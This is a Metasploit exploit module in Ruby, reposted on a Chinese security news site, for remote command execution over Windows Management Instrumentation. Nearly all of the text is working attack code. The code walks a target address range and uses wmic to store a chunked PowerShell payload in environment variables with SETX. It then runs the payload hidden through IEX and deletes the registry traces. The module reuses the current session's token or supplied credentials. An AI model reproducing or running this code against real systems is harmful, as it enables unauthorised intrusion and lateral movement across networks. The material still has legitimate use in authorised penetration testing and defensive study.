首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Management Instrumentation (WMI) Remote Command Execution
来源:metasploit.com 作者:Campbell 发布时间:2013-10-23  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Management Instrumentation (WMI) Remote Command Execution',
        'Description'   => %q{
          This module executes powershell on the remote host using the current
          user credentials or those supplied. Instead of using PSEXEC over TCP
          port 445 we use the WMIC command to start a Remote Procedure Call on
          TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
          traffic through that session.

          The result is similar to psexec but with the added benefit of using
          the session's current authentication token instead of having to know
          a password or hash.

          We do not get feedback from the WMIC command so there are no
          indicators of success or failure. The remote host must be configured
          to allow remote Windows Management Instrumentation.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
          ],
        'References'    =>
          [
            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
            [ 'OSVDB', '3106'],
            [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
          ],
        'DefaultOptions' =>
            {
                'EXITFUNC' => 'thread',
                'WfsDelay' => '15',
            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ],
        'Targets'	=>
        [
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
        'DefaultTarget' => 0
      ))

    register_options([
      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
      # Move this out of advanced
      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
    ])
  end

  def exploit
    if datastore['SMBUser'] and datastore['SMBPass'].nil?
      fail_with(Failure::BadConfig, "Need both username and password set.")
    end

    Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
      # TODO: CHECK WMIC Access by reading the clipboard?
      # TODO: wmic /output:clipboard
      # TODO: Needs to be meterpreter ext side due to threading

      # Get the PSH Payload and split it into bitesize chunks
      # 1024 appears to be the max value allowed in env vars
      psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
      psh = psh[psh.index("$si")..psh.length-1]
      chunks = split_code(psh, 1024)

      begin
        print_status("[#{server}] Storing payload in environment variables")
        env_name = rand_text_alpha(rand(3)+3)
        env_vars = []
        0.upto(chunks.length-1) do |i|
          env_vars << "#{env_name}#{i}"
          c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
          wmic_command(server, c)
        end

        x = rand_text_alpha(rand(3)+3)
        exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
        env_vars.each do |env|
          exec_cmd << "+$env:#{env}"
        end
        exec_cmd << ";IEX $#{x};"

        print_status("[#{server}] Executing payload")
        wmic_command(server, exec_cmd)

        print_status("[#{server}] Cleaning up environment variables")
        env_vars.each do |env|
          cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
          wmic_command(server, cleanup_cmd)
        end
      rescue Rex::Post::Meterpreter::RequestError => e
        print_error("[#{server}] Error moving on... #{e}")
        next
      ensure
        select(nil,nil,nil,2)
      end
    end
  end

  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
    userpass = ""

    unless user.nil?
      if domain.nil?
        userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
      else
        userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
      end
    end

    return userpass
  end

  def wmic_command(server, cmd)
    wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
    vprint_status("[#{server}] #{wcmd}")

    # We dont use cmd_exec as WMIC cannot be Channelized
    ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
    select(nil,nil,nil,0.1)
  end

  def split_code(psh, chunk_size)
    array = []
    idx = 0
    while (idx < psh.length)
      array << psh[idx, chunk_size]
      idx += chunk_size
    end
    return array
  end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR-605L Captcha Handli
·EMC Replication Manager Comman
·Interactive Graphical SCADA Sy
·Joomla Component com_maianmedi
·HP Intelligent Management Cent
·Symantec Workspace Streaming 7
·FiberHome Modem Router HG-110
·Photodex ProShow Producer 5.0.
·WebTester 5.x Command Executio
·FortKnox Personal Firewall 9.0
·PHP Point Of Sale 10.x / 11.x
·Open Flash Chart 2 Arbitrary F
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved